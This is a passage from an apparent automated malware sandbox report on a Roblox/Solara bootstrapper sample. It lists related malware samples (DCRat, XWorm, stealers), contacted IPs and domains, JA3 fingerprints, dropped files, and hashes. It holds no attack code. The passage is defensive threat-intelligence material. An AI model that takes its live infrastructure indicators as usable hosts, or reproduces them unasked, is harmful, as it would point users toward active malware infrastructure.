                                                                                                                                                    getsolara.devKKjubdmzCR.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                    • 104.21.93.27
                                                                                                                                                    AYUGPPBj0x.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                    • 104.21.93.27
                                                                                                                                                    IM3OLcx7li.exeGet hashmaliciousXWormBrowse
                                                                                                                                                    • 172.67.203.125
                                                                                                                                                    SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                    • 172.67.203.125
                                                                                                                                                    cgqdM4IA7C.exeGet hashmaliciousXWormBrowse
                                                                                                                                                    • 172.67.203.125
                                                                                                                                                    oIDX88LpSs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                    • 172.67.203.125
                                                                                                                                                    hKWBNgRd7p.exeGet hashmaliciousXWormBrowse
                                                                                                                                                    • 172.67.203.125
                                                                                                                                                    SecuriteInfo.com.Variant.MSILHeracles.168781.2591.26227.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.21.93.27
                                                                                                                                                    SecuriteInfo.com.Variant.MSILHeracles.168781.2591.26227.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 104.21.93.27
                                                                                                                                                    8svMXMXNRn.exeGet hashmaliciousNoCry, XWormBrowse
                                                                                                                                                    • 104.21.93.27
                                                                                                                                                    23.ip.gl.ply.ggRLesaPFXew.exeGet hashmaliciousSilverRatBrowse
                                                                                                                                                    • 147.185.221.23
                                                                                                                                                    r8gcHFIf3x.exeGet hashmaliciousXWormBrowse
                                                                                                                                                    • 147.185.221.23
                                                                                                                                                    q0SpP6HxtE.exeGet hashmaliciousXWormBrowse
                                                                                                                                                    • 147.185.221.23
                                                                                                                                                    edge-term4-fra2.roblox.comKKjubdmzCR.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                    • 128.116.123.3
                                                                                                                                                    SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                    • 128.116.123.4
                                                                                                                                                    oIDX88LpSs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                    • 128.116.123.4
                                                                                                                                                    hKWBNgRd7p.exeGet hashmaliciousXWormBrowse
                                                                                                                                                    • 128.116.123.3
                                                                                                                                                    BootstrapperV1.19.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                    • 128.116.123.4
                                                                                                                                                    SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 128.116.123.3
                                                                                                                                                    SecuriteInfo.com.Win64.MalwareX-gen.4290.27796.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 128.116.123.3
                                                                                                                                                    SecuriteInfo.com.Win64.MalwareX-gen.22026.2513.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 128.116.123.4
                                                                                                                                                    Roblox Account Manager.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 128.116.123.3
                                                                                                                                                    SolaraBootstrapper.exeGet hashmaliciousDCRat, XWormBrowse
                                                                                                                                                    • 128.116.123.3

                                                                                                                                                    ASNs

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    ROBLOX-PRODUCTIONUSKKjubdmzCR.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                    • 128.116.123.3
                                                                                                                                                    AYUGPPBj0x.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                    • 128.116.44.3
                                                                                                                                                    IM3OLcx7li.exeGet hashmaliciousXWormBrowse
                                                                                                                                                    • 128.116.44.4
                                                                                                                                                    SecuriteInfo.com.Win32.Agent-BDOJ.1516.18040.exeGet hashmaliciousBlank GrabberBrowse
                                                                                                                                                    • 128.116.123.4
                                                                                                                                                    la.bot.arm.elfGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 128.116.110.16
                                                                                                                                                    cgqdM4IA7C.exeGet hashmaliciousXWormBrowse
                                                                                                                                                    • 128.116.21.4
                                                                                                                                                    oIDX88LpSs.exeGet hashmaliciousXWormBrowse
                                                                                                                                                    • 128.116.123.4
                                                                                                                                                    hKWBNgRd7p.exeGet hashmaliciousXWormBrowse
                                                                                                                                                    • 128.116.123.3
                                                                                                                                                    8svMXMXNRn.exeGet hashmaliciousNoCry, XWormBrowse
                                                                                                                                                    • 128.116.44.3
                                                                                                                                                    https://www.roblox.sc/users/294681399108/profileGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 128.116.122.3
                                                                                                                                                    TUT-ASUS(#U0130TOSAM) 11 KASIM 2024 HAFTALIK EKONOM#U0130 B#U00dcLTEN#U0130.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                    • 208.95.112.1
                                                                                                                                                    file.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                                                    • 208.95.112.1
                                                                                                                                                    file.exeGet hashmaliciousClipboard HijackerBrowse
                                                                                                                                                    • 208.95.112.1
                                                                                                                                                    https://storage.googleapis.com/windows_bucket1/turbo/download/TurboVPN_setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 208.95.112.1
                                                                                                                                                    file.exeGet hashmaliciousAmadey, Stealc, VidarBrowse
                                                                                                                                                    • 208.95.112.1
                                                                                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 208.95.112.1
                                                                                                                                                    file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 208.95.112.1
                                                                                                                                                    x.batGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 208.95.112.1
                                                                                                                                                    nuevo orden.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                    • 208.95.112.1
                                                                                                                                                    transferencia interbancaria_867897870877.xlam.xlsxGet hashmaliciousAgentTeslaBrowse
                                                                                                                                                    • 208.95.112.1
                                                                                                                                                    SALSGIVERUS6qwSgLbPO9.exeGet hashmaliciousXWormBrowse
                                                                                                                                                    • 147.185.221.23
                                                                                                                                                    RLesaPFXew.exeGet hashmaliciousSilverRatBrowse
                                                                                                                                                    • 147.185.221.23
                                                                                                                                                    mips.elfGet hashmaliciousMirai, MoobotBrowse
                                                                                                                                                    • 147.176.207.108
                                                                                                                                                    rboancbWce.exeGet hashmaliciousXWormBrowse
                                                                                                                                                    • 147.185.221.23
                                                                                                                                                    dUoETPmfo3.exeGet hashmaliciousOrcusBrowse
                                                                                                                                                    • 147.185.221.23
                                                                                                                                                    MAqlwGvuGr.exeGet hashmaliciousSheetRatBrowse
                                                                                                                                                    • 147.185.221.23
                                                                                                                                                    V2Avz54IzW.exeGet hashmaliciousXWormBrowse
                                                                                                                                                    • 147.185.221.23
                                                                                                                                                    explorers.exeGet hashmaliciousXWormBrowse
                                                                                                                                                    • 147.185.221.23
                                                                                                                                                    wilde.exe.bin.exeGet hashmaliciousXWormBrowse
                                                                                                                                                    • 147.185.221.23
                                                                                                                                                    7jgFDJY46m.exeGet hashmaliciousNjratBrowse
                                                                                                                                                    • 147.185.221.23

                                                                                                                                                    JA3 Fingerprints

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    3b5074b1b5d032e5620f69f9f700ff0eUnit 2_week 4 2024.pptxGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 128.116.123.3
                                                                                                                                                    • 104.21.93.27
                                                                                                                                                    • 104.20.22.46
                                                                                                                                                    https://url.us.m.mimecastprotect.com/s/7XsKCQWmqkh6El9PsPhEHGZMGK?domain=hbgone.docdroid.comGet hashmaliciousUnknownBrowse
                                                                                                                                                    • 128.116.123.3
                                                                                                                                                    • 104.21.93.27
                                                                                                                                                    • 104.20.22.46
                                                                                                                                                    https://www.google.ml/url?fvg=1YI3fC8whlGPBCiMyiuQ&bhtBf=8EQhXbuMThqowIo0zyCX&sa=t&ndg=afydNw3nDHf9A6uq2MCH&url=amp%2Fiestpcanipaco.edu.pe%2F.r%2Fu1kOgE-SURELILYYWRhcnNoLm1hbGhvdHJhQGphdG8uY29tGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 128.116.123.3
                                                                                                                                                    • 104.21.93.27
                                                                                                                                                    • 104.20.22.46
                                                                                                                                                    ATT61999.htmGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 128.116.123.3
                                                                                                                                                    • 104.21.93.27
                                                                                                                                                    • 104.20.22.46
                                                                                                                                                    INQ02010391.vbsGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    • 128.116.123.3
                                                                                                                                                    • 104.21.93.27
                                                                                                                                                    • 104.20.22.46
                                                                                                                                                    Company Profile_pdf.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                                    • 128.116.123.3
                                                                                                                                                    • 104.21.93.27
                                                                                                                                                    • 104.20.22.46
                                                                                                                                                    https://forms.office.com/Pages/ShareFormPage.aspx?id=xW69F1aTs06UvACEsnZeONWs3ov4-fZJk9ZDjpIIN5tUMUFMSUpJVVFUWEtHTFlURVNUWE1QV1hXQi4u&sharetoken=2Z2A4vYPJAA4bBGx5zDgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 128.116.123.3
                                                                                                                                                    • 104.21.93.27
                                                                                                                                                    • 104.20.22.46
                                                                                                                                                    Draft_Order_Form_6335_pdf_nsg.pdfGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                                                                    • 128.116.123.3
                                                                                                                                                    • 104.21.93.27
                                                                                                                                                    • 104.20.22.46
                                                                                                                                                    https://forms.office.com/Pages/ShareFormPage.aspx?id=xW69F1aTs06UvACEsnZeONWs3ov4-fZJk9ZDjpIIN5tUMUFMSUpJVVFUWEtHTFlURVNUWE1QV1hXQi4u&sharetoken=2Z2A4vYPJAA4bBGx5zDgGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                    • 128.116.123.3
                                                                                                                                                    • 104.21.93.27
                                                                                                                                                    • 104.20.22.46
                                                                                                                                                    file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                    • 128.116.123.3
                                                                                                                                                    • 104.21.93.27
                                                                                                                                                    • 104.20.22.46

                                                                                                                                                    Dropped Files

                                                                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                    C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exeKKjubdmzCR.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_BootstrapperV1.2_b3bef142175e2c9feedfe8f06a73673fcbfff2_9c4008b6_abf3f392-340e-42d3-be22-ab1c93f18fd7\Report.wer

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                      File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):65536
                                                                                                                                                      Entropy (8bit):1.2704320226484662
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:p2ZgHcTwr0bU9+dQu65a+xejol2/fsLzuiFsZ24lO8q5:pMgHcTPbG+dQ1a+l23sLzuiFsY4lO8a
                                                                                                                                                      MD5:021B6C5D35A5377878CBA5978E0E072D
                                                                                                                                                      SHA1:3A2FE7E806404DBFF013F079B1F6753633765F2A
                                                                                                                                                      SHA-256:F3936D8EDBD6BB57900708AF7F789FA1D6D19FC26243171C1CBF5CB54E978271
                                                                                                                                                      SHA-512:182F3161671DD326A8F2FFC06A794CCBA8FBCF12CB4AB2F9EC3F021E9A841B7C3D7E4E24A83EACF0FA2CA96C5EFD2DBBCE0D3D9E42FA46407E45DB4882C93053
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.7.6.0.8.5.2.5.0.8.2.4.7.6.8.3.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.7.6.0.8.5.2.5.1.7.1.5.3.9.2.2.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.b.f.3.f.3.9.2.-.3.4.0.e.-.4.2.d.3.-.b.e.2.2.-.a.b.1.c.9.3.f.1.8.f.d.7.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.a.d.a.2.8.f.1.5.-.9.1.c.6.-.4.a.c.4.-.a.9.2.1.-.9.8.2.2.7.c.3.e.d.3.d.b.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....N.s.A.p.p.N.a.m.e.=.B.o.o.t.s.t.r.a.p.p.e.r.V.1...2.3...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.S.o.l.a.r.a.B.o.o.t.s.t.r.a.p.p.e.r...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.0.f.e.0.-.0.0.0.1.-.0.0.1.4.-.b.7.f.f.-.4.e.5.c.c.9.3.6.d.b.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.2.f.e.1.7.3.6.3.1.c.a.d.c.4.a.7.6.9.5.d.3.9.9.5.7.a.1.2.d.e.9.c.0.0.0.0.0.0.0.0.!.0.0.0.0.3.0.2.3.1.a.4.6.7.a.4.9.c.c.3.7.7.6.8.e.e.a.0.f.5.5.f.4.b.e.a.1.c.b.f.

                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERAD5E.tmp.dmp

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                      File Type:Mini DuMP crash report, 16 streams, Thu Nov 14 19:14:11 2024, 0x1205a4 type
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):605734
                                                                                                                                                      Entropy (8bit):3.2960105305598377
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3072:KZsHpbekFpEo3+vboVmfyBOXpIymdSZCdhWRrAm4WPVjNpZOD0RvaXcS3eq7qe7W:skbesEo3QAhQHXdpX1uuarMNqJbq
                                                                                                                                                      MD5:B1B2AE53236596FF126B2B885807DBC4
                                                                                                                                                      SHA1:E4D420E434064CD7CAE4137B475FBC1177651BFA
                                                                                                                                                      SHA-256:191E71DA695634E17A11EF12E5B79E1F89622A84A5344CF14A486E21016C58CD
                                                                                                                                                      SHA-512:DDDD38FE73F7A476F8300FDC7933424F8835D80C95104D9A1F0EEC608A36FFA4E1A5E13B8C783FD5F561F72C5D31AF5C973D2186AEBD65DD2B40BACF74C5370D
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:MDMP..a..... ........L6g............4...........<...T.......<....)...........)......$T..............l.......8...........T............U..v............E...........G..............................................................................eJ......@H......Lw......................T............K6g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...........................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERAF82.tmp.WERInternalMetadata.xml

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                      File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):6820
                                                                                                                                                      Entropy (8bit):3.7174364199647982
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:192:R6l7wVeJ6oZzMMtYZK8Tprk89bG/Ef09Cm:R6lXJVZzMMtYAEGsfQ
                                                                                                                                                      MD5:E9CAC4DC66C260E7C923D0651383CCB7
                                                                                                                                                      SHA1:7D4844ADC8CE49E5B396DCA8EC10EE0D6AB74009
                                                                                                                                                      SHA-256:F6714032B2B00ADDF9C5AA57A90A050DB928DC791D3B45F4E0B8E78A02C952FD
                                                                                                                                                      SHA-512:FB8BC740AEFD1F7732E852A80A137201BFCAC08458776C254554D0A5E5F179FC3CA1C103EA3664A8027C64D1DB09BEE67BCA991631B59A2B83370950BA074762
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.0.6.4.<./.P.i.

                                                                                                                                                      C:\ProgramData\Microsoft\Windows\WER\Temp\WERAFB1.tmp.xml

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WerFault.exe
                                                                                                                                                      File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):4834
                                                                                                                                                      Entropy (8bit):4.46829897990708
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:48:cvIwWl8zstJg771I93MWpW8VYYpYm8M4JQKy/F4Qyq8vaygDx5b5Rd:uIjfHI7kl7V+JGWaf1Rd
                                                                                                                                                      MD5:48177B2B2170E81572E988DD1CAB60EC
                                                                                                                                                      SHA1:9012FAC33EE232A28E9F66C496285E836E24412F
                                                                                                                                                      SHA-256:8534E9B8003B099D6E6E121CC5BD26A9D3231901C85746E0F4E8EC587E66192A
                                                                                                                                                      SHA-512:9F0A4C4C2F6A06F0EC203C683316D74A112C201AC93299518080487A36E800B1F177D59BD76B031CA94708F2825B778192C75D4C56BF3522E40611F2F84D8414
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="588136" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\8Hd0ZExgJz.exe.log

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\Desktop\8Hd0ZExgJz.exe
                                                                                                                                                      File Type:CSV text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):654
                                                                                                                                                      Entropy (8bit):5.380476433908377
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                                                                      MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                                                                      SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                                                                      SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                                                                      SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                                                                      Malicious:true
                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Injector.exe.log

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\AppData\Local\Temp\Injector.exe
                                                                                                                                                      File Type:CSV text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):1492
                                                                                                                                                      Entropy (8bit):5.3787668257697945
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:24:ML9E4KQ71qE4GIs0E4KCKDE4KGKZI6KhwE4ksKIE4TKBGKoZAE4KKUNb:MxHKQ71qHGIs0HKCYHKGSI6owHptHTHf
                                                                                                                                                      MD5:761D1106534DF52590D691CAD8962C57
                                                                                                                                                      SHA1:D3678D8F8635FF85D354F7EE2FFC24008357DC5B
                                                                                                                                                      SHA-256:73784F8EEA9F790E13C7DA5137D0735B161D974DE8F748ABFD4A3951CE91FAB2
                                                                                                                                                      SHA-512:AA3595F2936C95C599C6E8C2784CA18FDC7DE34F290D38B56FCC52D82CDCBF002EAE0BB16DD6355DC8AD85F6DCC69246FD3D07274A49C9914F4769F256BA16ED
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Drawing\567ff6b0de7f9dcd8111001e94ab7cf6\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Windows.Forms\2a7fffeef3976b2a6f273db66b1f0107\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"System.Net.Http, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\System

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\Windows Security Host.exe.log

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\Windows Security Host.exe
                                                                                                                                                      File Type:CSV text
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):654
                                                                                                                                                      Entropy (8bit):5.380476433908377
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12:Q3La/KDLI4MWuPXcp1OKbbDLI4MWuPOKfSSI6Khap+92n4MNQp3/VXM5gXu9tv:ML9E4KQwKDE4KGKZI6Kh6+84xp3/VclT
                                                                                                                                                      MD5:30E4BDFC34907D0E4D11152CAEBE27FA
                                                                                                                                                      SHA1:825402D6B151041BA01C5117387228EC9B7168BF
                                                                                                                                                      SHA-256:A7B8F7FFB4822570DB1423D61ED74D7F4B538CE73521CC8745BC6B131C18BE63
                                                                                                                                                      SHA-512:89FBCBCDB0BE5AD7A95685CF9AA4330D5B0250440E67DC40C6642260E024F52A402E9381F534A9824D2541B98B02094178A15BF2320148432EDB0D09B5F972BA
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System\b187b7f31cee3e87b56c8edca55324e0\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_64\System.Core\31326613607f69254f3284ec964796c8\System.Core.ni.dll",0..3,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_64\Microsoft.V9921e851#\04de61553901f06e2f763b6f03a6f65a\Microsoft.VisualBasic.ni.dll",0..

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                      File Type:data
                                                                                                                                                      Category:modified
                                                                                                                                                      Size (bytes):64
                                                                                                                                                      Entropy (8bit):0.34726597513537405
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:3:Nlll:Nll
                                                                                                                                                      MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                      SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                      SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                      SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                      Malicious:false
                                                                                                                                                      Preview:@...e...........................................................

                                                                                                                                                      C:\Users\user\AppData\Local\Temp\BootstrapperV1.23.exe

                                                                                                                                                      Download File
                                                                                                                                                      Process:C:\Users\user\Desktop\8Hd0ZExgJz.exe
                                                                                                                                                      File Type:PE32+ executable (console) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):819200
                                                                                                                                                      Entropy (8bit):5.598261375667174
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:12288:qhd8cjaLXVh84wEFkW1mocaBj6WtiRPpptHxQ0z:2ycjar84w5W4ocaBj6y2tHDz
                                                                                                                                                      MD5:02C70D9D6696950C198DB93B7F6A835E
                                                                                                                                                      SHA1:30231A467A49CC37768EEA0F55F4BEA1CBFB48E2
                                                                                                                                                      SHA-256:8F2E28588F2303BD8D7A9B0C3FF6A9CB16FA93F8DDC9C5E0666A8C12D6880EE3
                                                                                                                                                      SHA-512:431D9B9918553BFF4F4A5BC2A5E7B7015F8AD0E2D390BB4D5264D08983372424156524EF5587B24B67D1226856FC630AACA08EDC8113097E0094501B4F08EFEB
                                                                                                                                                      Malicious:true
                                                                                                                                                      Antivirus:
                                                                                                                                                      • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                                                                                                                      Joe Sandbox View:
                                                                                                                                                      • Filename: KKjubdmzCR.exe, Detection: malicious, Browse
